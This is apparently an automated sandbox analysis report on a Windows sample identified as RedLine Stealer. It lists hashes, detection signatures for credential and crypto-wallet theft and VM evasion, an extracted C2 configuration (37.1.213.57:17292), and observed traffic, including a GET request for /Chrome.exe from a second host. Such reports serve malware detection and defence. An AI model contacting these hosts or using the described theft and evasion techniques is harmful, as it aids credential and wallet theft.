Loading ...

Play interactive tourEdit tour

Windows Analysis Report 84Xhvb840M.exe

Overview

General Information

Sample Name:84Xhvb840M.exe
Analysis ID:534012
MD5:a299e78d8704d2840a0466488f5fe3d9
SHA1:479a930f871cba97457415b8246fd490f8895b3f
SHA256:129f4f1ff9ed242fe57ac927522a46d3a35a48c38003fbb464c421981b63a813
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Tries to steal Crypto Currency Wallets
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Machine Learning detection for sample
.NET source code contains potential unpacker
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
PE file has nameless sections
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • 84Xhvb840M.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\84Xhvb840M.exe" MD5: A299E78D8704D2840A0466488F5FE3D9)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "37.1.213.57:17292", "Bot Id": "551441714"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.273844894.00000000035F0000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000000.00000002.335990015.0000000000402000.00000040.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        Process Memory Space: 84Xhvb840M.exe PID: 7120JoeSecurity_RedLineYara detected RedLine StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.84Xhvb840M.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 84Xhvb840M.exe.7120.0.memstrminMalware Configuration Extractor: RedLine {"C2 url": "37.1.213.57:17292", "Bot Id": "551441714"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: 84Xhvb840M.exeVirustotal: Detection: 33%Perma Link
            Source: 84Xhvb840M.exeMetadefender: Detection: 38%Perma Link
            Source: 84Xhvb840M.exeReversingLabs: Detection: 78%
            Machine Learning detection for sampleShow sources
            Source: 84Xhvb840M.exeJoe Sandbox ML: detected

            Compliance:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\84Xhvb840M.exeUnpacked PE file: 0.2.84Xhvb840M.exe.400000.0.unpack
            Source: 84Xhvb840M.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 84Xhvb840M.exe, 00000000.00000003.272872650.00000000035F0000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.336058489.0000000000444000.00000040.00020000.sdmp
            Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
            Source: global trafficHTTP traffic detected: GET /Chrome.exe HTTP/1.1Host: 94.250.250.30Connection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.2.3:49742 -> 37.1.213.57:17292
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 04 Dec 2021 23:27:48 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 275Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 39 34 2e 32 35 30 2e 32 35 30 2e 33 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 94.250.250.30 Port 80</address></body></html>
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: unknownTCP traffic detected without corresponding DNS query: 37.1.213.57
            Source: 84Xhvb840M.exe, 00000000.00000002.341578250.0000000003DC2000.00000004.00000001.sdmpString found in binary or memory: http://94.250.250.30
            Source: 84Xhvb840M.exe, 00000000.00000002.341549842.0000000003DA9000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341099277.000000000397C000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341578250.0000000003DC2000.00000004.00000001.sdmpString found in binary or memory: http://94.250.250.30/Chrome.exe
            Source: 84Xhvb840M.exe, 00000000.00000002.341578250.0000000003DC2000.00000004.00000001.sdmpString found in binary or memory: http://94.250.250.304
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
            Source: 84Xhvb840M.exe, 00000000.00000003.335639728.0000000000D4C000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.336765168.0000000000D4D000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault$
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
            Source: 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
            Source: 84Xhvb840M.exe, 00000000.00000002.341099277.000000000397C000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
            Source: 84Xhvb840M.exe, 00000000.00000002.341549842.0000000003DA9000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmp, 84Xhvb840M.exe, 00000000.00000002.341110308.0000000003980000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
            Source: 84Xhvb840M.exe, 00000000.00000002.341049588.00000000038E1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
